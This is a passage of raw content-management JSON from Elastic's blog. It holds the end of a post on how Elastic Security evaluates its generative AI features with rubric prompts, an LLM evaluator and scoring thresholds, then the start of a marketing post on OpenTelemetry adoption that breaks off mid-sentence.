(info)"}},{"image":{"image":{"uid":"blta26147381c7a0791","_version":1,"title":"image10.png","created_by":"bltb6c155cd84fc0c1a","updated_by":"bltb6c155cd84fc0c1a","created_at":"2025-02-03T15:59:33.998Z","updated_at":"2025-02-03T15:59:33.998Z","content_type":"image/png","file_size":"225169","filename":"image10.png","ACL":{},"parent_uid":null,"is_dir":false,"tags":[],"publish_details":{"time":"2025-02-03T16:19:03.846Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blta26147381c7a0791/67a0e7e6ecc9d77b63412c09/image10.png"},"_metadata":{"uid":"cs4e2aa46b0a976b82"},"caption_l10n":"High-level diagram on our AI Agent workflows and tracing","alt_text_l10n":"High-level diagram on our AI Agent workflows and tracing","disable_lightbox":false,"remove_shadow":true,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"Evaluation rubrics and scoring mechanism","_metadata":{"uid":"cs3861cd040b85545b"},"header_style":"H3","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eRubrics are a way of evaluating a defined “desired behavior” of the LLM outputs and can contain many \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cem\u003eitems \u003c/em\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e— each responsible for checking a subset of desired behaviors. For instance, this could include the desired behavior of “the LLM should respond with plain language” and the evaluation rubric including the item “is the response written in plain language?”\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eFor Elastic Security, this is an example of our rubric prompts and contains many evaluation items:\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003e5. Evaluate the value of the \"summaryMarkdown\" field of all the \"attackDiscoveries\" in the submission JSON. Are the values of \"summaryMarkdown\" in the \"submission\" at least partially similar to that of the \"expected response\", regardless of the order in which they appear, and summarize the same incident(s)? Summarize each summary, and explain your answer with lettered steps.\u003c/span\u003e\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003e6. Evaluate the value of the \"title\" field of all the \"attackDiscoveries\" in the submission json. Are the \"title\" values in the submission at least partially similar to the title(s) of the \"expected response\", regardless of the order in which they appear, and mention the same incident(s)?\u003c/span\u003e\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eWith this rubric, we then use an LLM evaluator to check if the responses satisfy the rubric as illustrated in the image below. This is done directly in the flow between when a user submits their query and when the response is displayed. The rubric prompt checks in real time if the LLM output is good enough; if not, it will go back to the initial generator LLM to regenerate a response. \u003c/span\u003e\u003ca href=\"https://smith.langchain.com/public/b424f40e-e457-4a31-8b43-9f059e1ea99e/r\" target=\"_blank\"\u003e\u003cspan style='font-size: 12pt;'\u003eSee an example LangSmith trace\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs7c618eb49b94ca0b"}}},{"image":{"image":{"uid":"blt5985eeafe32138fe","_version":1,"title":"image7.png","created_by":"bltb6c155cd84fc0c1a","updated_by":"bltb6c155cd84fc0c1a","created_at":"2025-02-03T16:01:27.129Z","updated_at":"2025-02-03T16:01:27.129Z","content_type":"image/png","file_size":"153186","filename":"image7.png","ACL":{},"parent_uid":null,"is_dir":false,"tags":[],"publish_details":{"time":"2025-02-03T16:19:03.867Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt5985eeafe32138fe/67a0e8574bee0b4f951845d3/image7.png"},"_metadata":{"uid":"cs051126ba82a042f7"},"caption_l10n":"Using an LLM evaluator to determine if responses satisfy the rubric","alt_text_l10n":"Using an LLM evaluator to determine if responses satisfy the rubric","disable_lightbox":false,"remove_shadow":true,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs99063ab7601f03bd"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eFor your use case, you may want to compare a few LLMs to determine which ones work the best for you. In our case, with this framework, we can evaluate an “evaluator” LLM as well as rubric prompts quantitatively as well.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"csc8bcf773b9d4d5d5"}}},{"image":{"image":{"uid":"blt8b7037832306d0cb","_version":1,"title":"image5.png","created_by":"bltb6c155cd84fc0c1a","updated_by":"bltb6c155cd84fc0c1a","created_at":"2025-02-03T16:01:59.425Z","updated_at":"2025-02-03T16:01:59.425Z","content_type":"image/png","file_size":"189221","filename":"image5.png","ACL":{},"parent_uid":null,"is_dir":false,"tags":[],"publish_details":{"time":"2025-02-03T16:19:03.827Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt8b7037832306d0cb/67a0e877956a026e68ba41ea/image5.png"},"_metadata":{"uid":"csc2f63c611062917b"},"caption_l10n":"Example of a pairwise evaluation with the dataset (simplified for understanding)","alt_text_l10n":"Example of a pairwise evaluation with the dataset (simplified for understanding)","disable_lightbox":false,"remove_shadow":true,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs882984b2b1100a6c"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eLastly, the scoring mechanism can create a final score based on your defined behaviors. For example, if you want to weigh a certain rubric higher, then you can multiply that score by a weight. In our case, we wanted to have a threshold of accuracy, so we would drop a prompt if the accuracy was lower than 85%. This is doable with your program of choice.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs56d9884c9e2d6453"}}},{"image":{"image":{"uid":"blt2f413e1056484a7c","_version":1,"title":"image8.png","created_by":"bltb6c155cd84fc0c1a","updated_by":"bltb6c155cd84fc0c1a","created_at":"2025-02-03T16:02:24.362Z","updated_at":"2025-02-03T16:02:24.362Z","content_type":"image/png","file_size":"164195","filename":"image8.png","ACL":{},"parent_uid":null,"is_dir":false,"tags":[],"publish_details":{"time":"2025-02-03T16:19:03.928Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt2f413e1056484a7c/67a0e89031e919652aa5b0ab/image8.png"},"_metadata":{"uid":"csafbdac78a3714549"},"caption_l10n":"Using Seaborn (Python) to generate a heatmap of the prompt evaluation results","alt_text_l10n":"Using Seaborn (Python) to generate a heatmap of the prompt evaluation results","disable_lightbox":false,"remove_shadow":true,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"csf9732ff2ad7302cb"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003ePutting it all together, you’d have an easily understandable results table — and you’d be able to see at a glance:\u003c/span\u003e\u003c/p\u003e\u003cul\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eIs this new prompt doing better? Is it doing better on certain rubric items or not?\u003c/span\u003e\u003c/p\u003e\u003cul\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eRubrics themselves can also be treated as prompts to improve on! For example, we tightened up the wording of the rubrics in one improvement, and when we reran this framework, it confirmed that they performed better.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003c/ul\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eWhich LLM was best at a specific task?\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eWhich LLM has that highest score per our scoring mechanism?\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cul\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eIf you’re troubleshooting or tweaking the scoring mechanism, setting the results table up this way helps to easily find what might have gone wrong.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003c/ul\u003e\u003c/li\u003e\u003c/ul\u003e"}],"_metadata":{"uid":"csbc27fb9c72839ad1"}}},{"image":{"image":{"uid":"blt55dd4033e3928809","_version":1,"title":"image3.png","created_by":"bltb6c155cd84fc0c1a","updated_by":"bltb6c155cd84fc0c1a","created_at":"2025-02-03T16:02:59.163Z","updated_at":"2025-02-03T16:02:59.163Z","content_type":"image/png","file_size":"191130","filename":"image3.png","ACL":{},"parent_uid":null,"is_dir":false,"tags":[],"publish_details":{"time":"2025-02-03T16:19:03.947Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt55dd4033e3928809/67a0e8b33064aa75905449ae/image3.png"},"_metadata":{"uid":"cs76f85c8e84a49a60"},"caption_l10n":"A summarized results table","alt_text_l10n":"A summarized results table","disable_lightbox":false,"remove_shadow":true,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"Looking ahead","_metadata":{"uid":"cs7617a46e822788bb"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eIn this blog, we’ve walked through our GenAI development process — particularly how we can improve prompts and compare different configurations like selecting different LLMs, which is extensible to comparing and selecting all components, such as vector databases. This is the backing behind future improvements to Attack Discovery, Elastic AI Assistant, and more.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eIf you’re a user of Attack Discovery or Elastic AI Assistant for Security, thank you for using our tools. We look forward to your feedback! If you’re interested in learning more and using AI to speed up attack triage, check out the \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/security/current/attack-discovery.html\"\u003e\u003cspan style='font-size: 12pt;'\u003eAttack Discovery\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e page and \u003c/span\u003e\u003ca href=\"https://www.elastic.co/security-labs\"\u003e\u003cspan style='font-size: 12pt;'\u003eSecurity Labs\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e articles.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eLastly, if you’re a GenAI developer, we hope that this article can help you with structuring an evaluation workflow. We’re also continuously improving on our GenAI development systems and looking forward to sharing more.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eIf you’re interested in learning more about how Elastic enables and powers GenAI tools around the world, check out our \u003c/span\u003e\u003ca href=\"https://www.elastic.co/search-labs\"\u003e\u003cspan style='font-size: 12pt;'\u003eElasticsearch Labs\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e articles.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs302085dd8d58c8eb"}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"csdaef8f09e35cc705"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 10pt;'\u003e\u003cem\u003eThe release and timing of any features or functionality described in this post remain at Elastic's sole discretion. Any features or functionality not currently available may not be delivered on time or at all.\u003c/em\u003e\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 10pt;'\u003e\u003cem\u003eIn this blog post, we may have used or referred to third party generative AI tools, which are owned and operated by their respective owners. Elastic does not have any control over the third party tools and we have no responsibility or liability for their content, operation or use, nor for any loss or damage that may arise from your use of such tools. Please exercise caution when using AI tools with personal, sensitive or confidential information. Any data you submit may be used for AI training or other purposes. There is no guarantee that information you provide will be kept secure or confidential. You should familiarize yourself with the privacy practices and terms of use of any generative AI tools prior to use.\u0026nbsp;\u003c/em\u003e\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 10pt;'\u003e\u003cem\u003eElastic, Elasticsearch, ESRE, Elasticsearch Relevance Engine and associated marks are trademarks, logos or registered trademarks of Elasticsearch N.V. in the United States and other countries. All other company and product names are trademarks, logos or registered trademarks of their respective owners.\u003c/em\u003e\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"csbee702536c420464"}}}],"publish_date":"2025-02-03","sanity_migration_complete":false,"seo":{"seo_title_l10n":"","seo_description_l10n":"","seo_image":null,"noindex":false,"canonical_tag":""},"subtitle_l10n":"A quantitative approach to prompt tuning and LLM evaluation","table_of_contents":{"blog_series":[]},"tags":[],"tags_culture":[],"tags_elastic_stack":[],"tags_industry":[],"tags_partner":[],"tags_topic":[{"_content_type_uid":"tags_topic","title":"Cybersecurity","label_l10n":"Cybersecurity","keyword":"cybersecurity","hidden_value":false,"tags":[],"locale":"en-us","uid":"blt276db992db94ced9","created_by":"blt3044324473ef223b70bc674c","updated_by":"blt3044324473ef223b70bc674c","created_at":"2023-11-06T20:37:07.408Z","updated_at":"2023-11-06T20:37:07.408Z","ACL":{},"_version":1,"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-04T10:22:02.082Z","user":"blt4b2e1169881270a8"}},{"_content_type_uid":"tags_topic","_version":1,"locale":"en-us","uid":"blt99b075caf3df4ca7","ACL":{},"created_at":"2023-11-06T21:41:39.171Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"generative-ai","label_l10n":"Generative AI","tags":[],"title":"Generative AI","updated_at":"2023-11-06T21:41:39.171Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T15:50:18.390Z","user":"blt4b2e1169881270a8"}},{"_content_type_uid":"tags_topic","title":"Knowledge base search","label_l10n":"Knowledge base search","keyword":"knowledge-base-search","hidden_value":false,"tags":[],"locale":"en-us","uid":"blt2c020c0c24ae64ef","created_by":"blt3044324473ef223b70bc674c","updated_by":"blt3044324473ef223b70bc674c","created_at":"2023-11-06T20:41:47.026Z","updated_at":"2023-11-06T20:41:47.026Z","ACL":{},"_version":1,"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T05:40:49.958Z","user":"blt4b2e1169881270a8"}},{"_content_type_uid":"tags_topic","_version":1,"locale":"en-us","uid":"blt43ad419de732b584","ACL":{},"created_at":"2023-11-06T21:31:46.367Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"security-analytics","label_l10n":"Security analytics","tags":[],"title":"Security analytics","updated_at":"2023-11-06T21:31:46.367Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:28:54.534Z","user":"blt4b2e1169881270a8"}},{"_content_type_uid":"tags_topic","_version":1,"locale":"en-us","uid":"bltf4c040a3cb414ac0","ACL":{},"created_at":"2023-11-06T21:32:35.092Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"semantic-search","label_l10n":"Semantic search","tags":[],"title":"Semantic search","updated_at":"2023-11-06T21:32:35.092Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:24:20.425Z","user":"blt4b2e1169881270a8"}},{"_content_type_uid":"tags_topic","_version":1,"locale":"en-us","uid":"blt38a3af2dfebcb772","ACL":{},"created_at":"2024-06-06T15:02:14.821Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"retrieval-augmented-generation-rag","label_l10n":"Retrieval augmented generation (RAG)","tags":[],"title":"Retrieval augmented generation (RAG)","updated_at":"2024-06-06T15:02:14.821Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2024-06-06T15:02:17.473Z","user":"blt3044324473ef223b70bc674c"}}],"tags_use_case":[{"_version":2,"locale":"en-us","uid":"blt6f00e40aaa5c6f0e","ACL":{},"created_at":"2020-06-17T03:32:57.128Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"siem","label_l10n":"SIEM","tags":[],"title":"SIEM","updated_at":"2020-07-06T22:20:05.385Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:24:19.450Z","user":"blt4b2e1169881270a8"}},{"_version":2,"locale":"en-us","uid":"blt569b48df66a9ba5d","ACL":{},"created_at":"2020-06-17T03:30:49.259Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"security","label_l10n":"Security","tags":[],"title":"Security","updated_at":"2020-07-06T22:20:03.211Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:24:19.430Z","user":"blt4b2e1169881270a8"}},{"_version":3,"locale":"en-us","uid":"blt10eb11313dc454f1","ACL":{},"created_at":"2020-06-17T03:30:26.497Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"enterprise-search","label_l10n":"Search","tags":[],"title":"Search","updated_at":"2023-07-19T16:04:51.718Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T15:50:17.232Z","user":"blt4b2e1169881270a8"}}],"thumbnail_image":{"uid":"blt15602a635f8a9720","_version":1,"title":"144760---2nd-Batch-of-10-GAI-blog-header-images_06.jpg","created_by":"bltb6c155cd84fc0c1a","updated_by":"bltb6c155cd84fc0c1a","created_at":"2025-02-03T16:18:13.780Z","updated_at":"2025-02-03T16:18:13.780Z","content_type":"image/jpeg","file_size":"25569","filename":"144760---2nd-Batch-of-10-GAI-blog-header-images_06.jpg","ACL":{},"parent_uid":null,"is_dir":false,"tags":[],"publish_details":{"time":"2025-02-03T16:19:03.836Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt15602a635f8a9720/67a0ec45956a02253fba4223/144760---2nd-Batch-of-10-GAI-blog-header-images_06.jpg"},"title":"Behind the scenes of Elastic Security’s generative AI features","title_l10n":"Behind the scenes of Elastic Security’s generative AI features","updated_at":"2025-02-03T16:18:16.324Z","updated_by":"bltb6c155cd84fc0c1a","url":"/blog/elastic-security-generative-ai-features","publish_details":{"time":"2025-02-03T16:19:03.302Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}},{"uid":"blt20ea384e2467574e","_version":4,"locale":"en-us","ACL":{},"abstract_l10n":"Discover how OpenTelemetry is revolutionizing enterprise observability by breaking down tool silos, reducing costs, and improving operational efficiency. Learn how standardized telemetry data collection can drive better business outcomes.","author":["bltd516a87082210f90"],"category":["bltb79594af7c5b4199"],"created_at":"2025-01-30T16:36:00.872Z","created_by":"bltb6c155cd84fc0c1a","markdown_l10n":"","modular_blocks":[{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cscfecb980c75496b9"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eModern organizations face an unprecedented observability challenge. As systems grow more complex and distributed, traditional monitoring approaches are struggling to keep pace. With data volumes doubling every two years and systems spanning multiple clouds and technologies, organizations need a new approach to maintain visibility into their operations. The challenge isn't just about collecting more data — it's also about making that data actionable and valuable across the organization.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"The cost of tool silos and fragmented observability","_metadata":{"uid":"cs30a6cba83ef0d0d5"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eThe hidden costs of fragmented observability extend far beyond tool licenses and infrastructure expenses. Organizations are grappling with a complex web of monitoring tools — each with its own agents, dashboards, and data formats. This fragmentation creates significant operational overhead with teams spending valuable time maintaining and correlating data across different systems instead of driving innovation.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eConsider this typical enterprise scenario: When an incident occurs, teams must navigate through multiple tools to piece together what happened. One team checks application performance metrics in their \u003c/span\u003e\u003ca href=\"https://www.elastic.co/observability/application-performance-monitoring\"\u003e\u003cspan style='font-size: 12pt;'\u003eapplication performance monitoring (APM) tool\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e; another team examines infrastructure metrics in a different system; and others dig through logs in yet another platform. This fragmentation not only slows down incident response but also makes it harder to prevent issues in the first place.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eThe impact on team productivity is substantial. Engineers often need to context-switch between multiple tools to troubleshoot issues, leading to longer resolution times and increased operational costs. Moreover, the lack of standardized data makes it difficult to correlate information across systems, creating blind spots that can lead to service disruptions and customer dissatisfaction.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Why OpenTelemetry and open standards change everything","_metadata":{"uid":"cs535997dae36f66ab"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eOpenTelemetry (OTel) represents a fundamental shift in how organizations approach observability. As the second most active Cloud Native Computing Foundation project after Kubernetes, OTel is breaking down the vendor lock-in barrier that has long plagued observability solutions. By providing a standardized way to collect and transmit telemetry data, OTel enables organizations to choose the best tools for their needs without being constrained by proprietary formats.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eThis standardization acts as a catalyst for innovation. When teams no longer need to worry about the underlying instrumentation mechanics, they can focus on extracting meaningful insights from their data. The power of community-driven standards ensures that OTel continues to evolve with industry needs and is supported by major contributors, including \u003c/span\u003e\u003ca href=\"https://www.elastic.co/observability/opentelemetry\"\u003e\u003cspan style='font-size: 12pt;'\u003eElastic\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e, Microsoft, and Google.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eThe project's impressive growth tells its own story. With over 9,160 contributors, 55,640+ code commits, and 1,100+ contributing companies, OpenTelemetry has become the de facto standard for observability instrumentation. This broad adoption ensures long-term sustainability and continuous innovation.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Real business outcomes with OpenTelemetry","_metadata":{"uid":"csff19d84f5617ca9e"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eOrganizations adopting OpenTelemetry are seeing tangible benefits across their operations. Cost reduction comes through consolidated tooling and simplified maintenance, while standardized data collection leads to faster problem resolution and improved service reliability. Teams can collaborate more effectively when everyone speaks the same observability language, leading to faster feature delivery and better customer experiences.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eHere's what this looks like in practice.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eFinancial impact:\u003c/strong\u003e\u003c/span\u003e\u003c/p\u003e\u003cul\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eReduced tooling costs through consolidation of monitoring solutions\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eLower training and onboarding costs with standardized practices\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eDecreased infrastructure costs through better resource utilization (fewer agents running)\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003c/ul\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eOperational efficiency:\u003c/strong\u003e\u003c/span\u003e\u003c/p\u003e\u003cul\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e40%–60% reduction in mean time to resolution (MTTR)\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eSimplified deployment and configuration management\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eReduced alert noise and false positives\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003c/ul\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eInnovation acceleration:\u003c/strong\u003e\u003c/span\u003e\u003c/p\u003e\u003cul\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eFaster feature deployment with built-in observability\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eImproved experimentation capabilities\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eBetter decision-making through comprehensive data analysis\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003c/ul\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eResource allocation becomes more efficient as organizations gain clear visibility into their entire technology stack. This comprehensive view enables better capacity planning and more informed investment decisions, ultimately driving better business outcomes.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"The path to OpenTelemetry success","_metadata":{"uid":"cs0aa96b3c567a60b1"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eSuccessful OpenTelemetry adoption starts with a focused approach. Begin with a pilot project that demonstrates value quickly, whether it's instrumenting a critical service or solving a specific observability challenge. Building internal champions is also crucial — identify team members who understand both the technical and business benefits of standardized observability.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Key milestones in the adoption journey","_metadata":{"uid":"cs01747e38dc76a8d4"},"header_style":"H3","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003e1. Assessment phase:\u003c/strong\u003e\u003c/span\u003e\u003c/p\u003e\u003cul\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eEvaluate current observability costs and pain points\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eIdentify high-value initial use cases\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eSet clear success metrics\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003c/ul\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003e2. Pilot implementation:\u003c/strong\u003e\u003c/span\u003e\u003c/p\u003e\u003cul\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eSelect a bounded context for initial deployment\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eImplement basic instrumentation\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eMeasure and document early results\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003c/ul\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003e3. Expansion phase:\u003c/strong\u003e\u003c/span\u003e\u003c/p\u003e\u003cul\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eScale successful patterns across teams\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eDevelop internal best practices\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eBuild automated deployment processes\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003c/ul\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003e4. Optimization phase:\u003c/strong\u003e\u003c/span\u003e\u003c/p\u003e\u003cul\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eFine-tune data collection and sampling\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eImplement advanced use cases\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eShare success stories and lessons learned\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003c/ul\u003e"},{"title_l10n":"Future-proofing your observability strategy","_metadata":{"uid":"csfbf7300ee5f16d4e"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eThe future of observability is being shaped by increasing system complexity and data volume. Open standards like OpenTelemetry ensure that organizations can adapt to these changes without being locked into specific vendor solutions. Elastic's commitment to the OpenTelemetry ecosystem — demonstrated by its position as a top three contributor and 